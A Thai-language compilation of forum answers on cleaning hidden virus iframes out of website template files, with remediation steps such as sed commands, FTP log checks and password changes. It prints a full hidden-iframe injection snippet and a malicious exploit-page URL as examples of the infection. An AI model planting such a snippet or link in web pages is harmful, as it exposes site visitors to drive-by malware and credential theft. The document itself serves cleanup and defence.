รวมบทความ ใช้โปรแกรมเอา iframe ไวรัสออกจากเมเพลตเนื่องมาจากเทมเพลตของเว็บไซต์โดนฝัง iframe ซึ่งจะเป็นสะพานนำไปสู่ลิงค์เว็บที่ปล่อยไวรัส เช่น
http://jl.chura.pl/rc/sploits/i1.html
ดูบทความอื่นๆเพิ่มเติม >>
- จะแก้ไขปัญหานี้ได้อย่างไรครับ มีวิธีที่จะแก้แบบไม่ต้องเปิดแก้ทีละไฟล์หรือป่าว
- จะป้องกันไม่ให้เกิดขึ้นต่อไปได้หรือไม่ อย่างไร
- สาเหตุที่เกิดอารการแบบนี้มาจากอะไร
คำถามและคำตอบต่างๆเหล่านี้ผมนำมาจากหลายนๆเว็บที่ประสบปัญหาเพื่อหาทางแก้ไขและเป็นวิทยาทานต่อท่านอื่นๆต่อไป และถ้ามีคำถาม ตำตอบใดที่ไม่ได้อ้างถึงที่มาต้องขออภัยไว้ ณ ที่นี่ด้วย
แก้ไขโดยไม่ต้องเปิดทีละไฟล์ ก็ใช้โปรแกรม Simple Search-Replace
ดาวน์โหลดที่นี่ >> จากนั้นก็ browse ทั้งโฟลเดอร์งานที่คิดว่าติดไวรัสครับ ใช้การ Search และ Replace ด้วยความว่างเปล่าครับ
By: fenohost
_____________________________________________________
มันเป็นไวรัสของเวป money2008.com
โดยจะทำให้คนเข้าเวปเจอการขโมยข้อมูลพวก บัตรเครดิตและข้อมูลส่วนตัว
ชื่อทางการ PWS-FerTP เจาะผ่าน ftp พึงมีการตรวจพบเมื่อ 2เดือนก่อน antivirus ที่แสกนเจอ คือเมกาฟีและร่มแดง
โดยจะทำการเจาะระบบผ่านทางรูรั่ว FTP โดยเข้าไปเพิ่มโค้ตของ index.htm main.htm default.htm index.php main.php default.php
โดยติดได้ทั้งเครื่องที่เป็นwindows และlinux ส่วนวิธีแก้ ถามเองละกัน
By: bioice
_____________________________________________________
การแก้ไข
1. ห้ามใช้ IE ในการ FTP ใครชอบใช้ให้เลิกซ่ะ
2. เครื่องที่จะใช้ upload หมั่น scan virus
3. หลังจาก upload ข้อมูลเสร็จ ให้ทำการเปลี่ยน Password ที่ server ทันที
4. ลองอ่าน log ไฟล์ "cat /va/log/proftpd/access.log" ดูว่า ip ไหนเข้ามา ftp เปลี่ยนไฟล์ ให้ทำการ Block IP นั้นซะ
By: ems
_____________________________________________________
ที่เครื่องมี user ที่ ftp ได้ทุกโดเมนอยู่หรือเปล่าครับ
เพราะปกติไวรัสต้วนี้จะดัก ftp password จากเครื่องที่ใช้ ftp แก้ไขเว็บ
เสร็จแล้วมันก็เข้าไปแก้ไขไฟล์เราผ่านทาง ftp ด้วย password ที่ดักได้
ถ้าดูจาก ftp log จะเห็นชัดเจนเลย ว่ามี connection เข้ามาแก้ไขไฟล์
และใน log ยังบอกอีกด้วยว่าใช้ user อะไรมาจาก ip ใหน
วิธีการแก้ไข
1. เปลี่ยนรหัส ftp ของ user ที่โดนใหม่ (หาเครื่องอื่นเข้าไปเปลี่ยน)
2. แก้ไขไฟล์ที่ถูกแก้ไขกลับมาเหมือนเดิม (ลบ tag ที่เพิ่มมาออก)
3. scan virus ในเครื่องที่ติดโทรจัน (เครื่องที่โดนดัก password)
แต่ถ้าโดนทั้งเครื่องแบบว่าไม่มี log การเข้ามาทาง ftp อันนี้แสดงว่าโดน hack ทางช่องโหว่ใดซักอย่าง
ปัญหาจะหนักกว่าแบบแรก คือต้องหาช่องโหว่ให้พบ ไม่งั้นไว้ก็มาอีก
ตอนนี้แนะนำให้เก็บ backup ไว้ให้ดี
By: KKE
บทความที่มา>>
_____________________________________________________
"โซนโดนไวรัสบุก!!!"โดยมันได้ทำการแทรกโค๊ด
<iframe src="
http://live-counter.net/?click=เลขห่าอะไรของมัน" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
ด้านล่างของทุกไฟล์ที่มีคำว่า index อยู่
เช่น index.html, index.php, BoomBamIndex.php, Baindexbeg.php
ด้านบนเป็นตัวอย่างบางส่วน
// ตอนนี้รู้สึกมันจะสิง %default% ด้วย
- เราจะเอาโค๊ดนั้นออกจากไฟล์เหล่านั้นอย่างไร?
ถ้า โหลดมาแล้วนั่งลบทีละไฟล์
ผล จะบ้ารึ! ไฟล์มีตั้งเป็นร้อย ๆ ไฟล์
- สงสัยเราต้องเขียนโค๊ดมานั่งรันไล่ไฟล์แล้วมั้งเนี่ย (คิด ๆ)
- เอ๊ะ ใช้ php ดีกว่าเพราะมีพวก file_get_contents
- โอ๊ะ มันต้องเกิน time out แหงม ๆ
- ก็ไม่ยาก เราก็เข้า ssh ไปรัน php โล้ด...
(เริ่มคิดไปไกล)
- กรรม แล้วถ้ามันติดเรื่อง permission ของไฟล์ล่ะ?
- ก็ exec เล้ย
- บ๊ะ ง่ายนิดเดียว
หลังจากนั้นสองนาที
- ตาย ๆ มามัวนั่งเขียนแบบนี้ (ชักขี้เกียจ เลยเข้า ssh จิ้มไปจิ้มมาดูเล่น ๆ )
เหวย ๆ ใช้ sed ซิ (โชคดีที่นึกขึ้นได้เพราะเคยอ่านบทความตอนเรียน linux สมัยหนุ่ม ๆ)
และแล้วเราก็จะได้....
find /var/www -name '*index*' -print0 | xargs -0 sed -i '/live-counter.net/ d'
'/live-counter.net/ d' คือมันจะลบบรรทัดที่พบคำนี้ไปยกบรรทัด
เรียบร้อย! กดแป๊กเดียว ก็จบ
บทความที่มา >>
_____________________________________________________
จากที่บอกมา... ไม่ใช่ virus ครับ เป็น script ที่ hack เข้าฝังตัว (คิดว่าใน /tmp) แล้วก็เรียกการทำงานผ่าน http ผ่านเว็บใครเว็บหนึ่ง เพื่อ run ให้ทำการ... เขียน index ไฟล์ใหม่เข้าไปครับ
อยากให้สังเกตุ permission ด้วยว่าเป็น owner apache หรือ users ในระบบกันแน่ครับ หากเป็น apache user มาเขียน index ใหม่...
ให้ลองค้นใน /tmp และ /var/tmp
โปรแกรมประเภทนี้...จะเป็น perl หรือ cgi ครับ
_____________________________________________________
